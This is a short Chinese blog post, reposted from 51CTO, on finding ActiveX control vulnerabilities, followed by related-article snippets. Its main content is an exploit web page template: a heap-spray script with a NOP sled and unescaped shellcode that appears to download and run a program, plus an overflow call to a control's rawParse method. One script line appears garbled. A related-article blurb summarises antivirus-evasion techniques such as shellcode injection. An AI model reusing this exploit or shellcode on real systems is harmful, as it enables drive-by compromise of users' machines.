ActiveX漏洞挖掘思路

简介:
   最近关于ActiveX控件漏洞猛报,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下载并安装欲测试的软件
(2)使用COM Explorer软件查看ActiveX控件的各种属性
(3)通过VS2005对象浏览器查看控件中的变量、函数、函数参数,从中寻找可能存在漏洞的参数。
(4)进行漏洞的测试
(5)编写漏洞利用网页
网页大致内容如下:
  1. <html>  
  2. <object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>  
  3. <body>  
  4. <SCRIPT language="javascript">  
  5.     var shellcode = unescape("%u9090"+"%u9090"+   
  6. "%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +   
  7. 。。。。。。(省略)   
  8. "%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +   
  9. "%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");   
  10. </script>  
  11. <SCRIPT language="javascript">  
  12. var bigblock = unescape("%u9090%u9090");   
  13. var headersize = 20;   
  14. var slackspace = headersize+shellcode.length;   
  15. while (bigblock.length<slackspace) bigblock+=bigblock;   
  16. fillblock = bigblock.substring(0, slackspace);   
  17. block = bigblock.substring(0, bigblock.length-slackspace);   
  18. while(block.length+slackspace<0x40000blockblock = block+block+fillblock;   
  19. memory = new Array();   
  20. for (x=0; x<300; x++) memory[x] = block + shellcode;   
  21. var buffer = '';   
  22. while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";   
  23. target.rawParse(buffer);   
  24. </script>  
  25. </body>  
  26. </html>  
 

 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/51083

相关文章
|
6月前
|
开发框架 小程序 前端开发
带你了解小程序的框架之谜
带你了解小程序的框架之谜
|
14天前
|
安全 API 数据安全/隐私保护
免杀开发基础(1)
本文是关于Windows恶意软件开发的技术介绍,主要包括动态函数加载和执行、Shellcode执行技术以及注入技术。动态函数加载避免了静态链接到特定库,增加了分析难度。Shellcode执行涉及通过指针、内存分配和回调函数等方式。注入技术如APC注入,包括枚举进程线程、分配内存、写入有效负载等步骤。此外,文章还提到了使用异或加密来隐藏Shellcode,以规避静态特征检测。总的来说,文章探讨了免杀技术的基础知识,强调了在恶意软件开发中灵活性和创意的重要性。
|
存储 监控 安全
Windows逆向学习提纲
Windows逆向学习提纲
206 0
Windows逆向学习提纲
|
Windows
艾伟:基于.NET平台的Windows编程实战(六)—— 题目管理功能的实现
本系列文章导航 基于.NET平台的Windows编程实战(一)——前言 基于.NET平台的Windows编程实战(二)—— 需求分析与数据库设计 基于.NET平台的Windows编程实战(四)—— 数据库操作类的编写 基于.
1104 0
|
Windows
艾伟_转载:基于.NET平台的Windows编程实战(六)—— 题目管理功能的实现
本系列文章导航 基于.NET平台的Windows编程实战(一)——前言 基于.NET平台的Windows编程实战(二)—— 需求分析与数据库设计 基于.NET平台的Windows编程实战(四)—— 数据库操作类的编写 基于.
1014 0
|
移动开发 JavaScript 前端开发

热门文章

最新文章